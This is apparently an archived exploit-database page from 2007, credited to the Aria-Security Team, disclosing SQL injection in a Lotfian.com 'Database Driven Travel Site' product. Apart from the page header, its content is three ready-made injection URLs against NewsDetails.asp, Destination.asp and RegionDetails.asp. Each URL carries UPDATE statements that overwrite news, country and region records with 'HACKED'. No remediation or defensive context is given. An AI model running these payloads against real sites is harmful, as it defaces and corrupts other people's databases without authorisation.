Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln
# Published : 2007-12-10
# Author : Aria-Security Team
# Previous Title : ViArt CMS/Shop/HelpDesk 3.3.2 Remote File Inclusion Vulnerability
# Next Title : Falt4 CMS RC4 10.9.2007 Multiple Remote Vulnerabilities

Aria-Security Team
http://Aria-Security.Net
-----------------------------
DATABASE DRIVEN TRAVEL SITE
Vendor: Lotfian.com

NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE gtsNews set NewsTitle='HACKED'

Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'

RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--

# www.Syue.com [2007-12-10]